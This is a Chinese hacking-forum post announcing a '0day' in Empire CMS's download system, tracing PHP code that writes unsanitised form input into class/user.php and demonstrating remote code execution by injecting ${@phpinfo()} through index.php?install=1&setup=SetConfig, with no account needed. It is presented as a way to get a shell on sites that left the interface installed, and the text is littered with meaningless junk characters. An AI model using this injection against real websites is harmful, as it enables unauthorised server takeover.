中国网络渗透测试联盟

标题: 帝国万能接口漏洞0day [打印本页]
作者: admin    时间: 2013-1-23 09:34
标题: 帝国万能接口漏洞0day
这是帝国的一套下载系统如图 ps(不需要任何账户和密码,直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口,如图 而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码 当我们
' `3 \  {+ Q3 V7 i
( Q9 t5 J' U5 h+ w( Q

  y* U5 }! O: t& `2 J0 G6 d2 f
这是帝国的一套下载系统 如图
+ [  a& S4 f; Wps(不需要任何账户和密码,直接写shell)


: R0 W  z! @2 N" o% b& L6 ?: I( [

由于很多站是由于下载要整合discuz 等等一些论坛....
/ o$ Y& a$ u4 Q0 V) u' x

4 L8 m& D/ O2 t  h/ M& z& j

而帝国他又有一个万能接口,如图

: w4 }* W8 e* ^, L2 W! n2 e0 F- X
[attach]170[/attach]6 I& {9 ?$ q3 K6 t4 h6 W, [
: _2 p( o! ?4 k& e9 y

而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码
& _. e6 u9 P. p( ]0 U: |* ^6 b# z. w
5 W& b7 E' c% m- ^当我们提交的时候,他地址是提交到index.php?install=1&setup=SetConfig

1. if($_GET['install']==1)
2. {
3. @include("../class/connect.php");
4. @include("../class/db_sql.php");
5. @include("../class/functions.php");
6. $link=db_connect();
7. $empire=new mysqlquery();
8. if($setup=="SetConfig")
9. {
10. SetUserCOMConfig($_POST);
11. }
12. elseif($setup=="alter")
13. {
14. InstallUserCOM();
15. }
16. elseif($setup=="update")
17. {
18. UpdateUserCOM();
19. }
20. else
21. {}

复制代码

他这里开始调用一个SetUserCOMConfig的函数了,我们继续跟踪
, f7 B# K" E) R6 W2 y3 _3 ~; \3 u- {! P4 k1 Y6 s" s# [
在data/fun.php中的15行8 G8 e1 R! |) p* M6 l5 r
; j) y3 m3 {3 }8 L3 Z6 K' ^. j
我们可以看到这个函数

1. function SetUserCOMConfig($add){
2. $filetext=ReadFiletext('data/user.php');
3. if(empty($filetext))
4. {
5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.');
6. }
7. $vr=explode(",",ReturnRepUserVar());
8. $count=count($vr);
9. for($i=0;$i<$count;$i++)
10. {
11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);
12. }
13. //写入配置文件
14. $fp=@fopen("../class/user.php","w");
15. if(!$fp)
16. {
, l* c7 I* e" @  t2 O& \
17. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.');
18. }
19. @fputs($fp,$filetext);
20. @fclose($fp);

复制代码

.....//省略若干
: X  t1 y% L+ F# d9 K- g0 z: }, ~
这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);
& Z, a" d) k5 V: M  f# N; c1 s+ ~8 g& U* F- d
他将传进来的变量进行了切割,然后赋给了$filetext
. x7 G1 g, |3 s% e1 M
. j/ u; ?( M4 o9 _  y* M! g5 E然后看下面

1. //写入配置文件
2. $fp=@fopen("../class/user.php","w");
3. if(!$fp)
4. {
5. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.');
6. }
7. @fputs($fp,$filetext);

复制代码

打开了一个class/user.php文件,然后将$filetext写入了
! m$ i. Q9 ?; A% T1 n- M: G% h, K" r6 j+ t2 g% r0 A2 h5 U
我们看看写入的结果,随便填一个

5 U& H& Q7 j) c5 y( L7 x1 O
[attach]171[/attach]
! k1 @7 H& R8 h2 X6 ]. Z7 ^" V- Y/ W9 N9 n. |7 _  o4 v$ U+ R: S
" a3 h0 b! K" C: r, l
[attach]172[/attach]
, @1 a! }  n! e& R. A' k  D0 O0 h& N1 A6 ?
, i, a) f- J1 L

) `! j6 z/ m! g5 J, y
5 D# B% n- @2 t( \: ^( x" ]+ h! k, d7 o; m& x8 W- g: Z

! |$ F1 R" g- ]0 o# ~% X
0 |, `, i. c4 I$ }; k" b. P8 z5 v/ f: n1 h9 K$ L# {( F

6 u8 B4 l! G8 O! U5 r( C[attach]173[/attach]- Q( k% r, J1 R4 ^
+ L9 A" z* Y" M5 Z; p  w: Z- M

- s( x- `2 N1 {( R- I. \0 z, @) I7 m: I( U0 }
8 \* A* Z& J7 x% S7 m
$ F' ]( l# P# t6 p2 h
[attach]174[/attach]
7 U( A4 S% c6 {8 q# a% H5 a6 e; k$ r! B* z& X% C# e: U: s/ g

所以我们淫荡点,写个${@phpinfo()}试试

# j2 M3 S; T6 }

然后访问以下class/user.php这个文件
9 {! p- I2 T' j  \- n日了吧


8 y! R: w' _) O. c! }- F; U1 u9 A1 ^- d2 b/ K

1 ]/ ^, }' ^. G. |( C+ {8 Q4 U; G! [5 ]! U

  n3 ?6 n$ J; R7 u, J) q0 J2 c0 p, U8 X




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2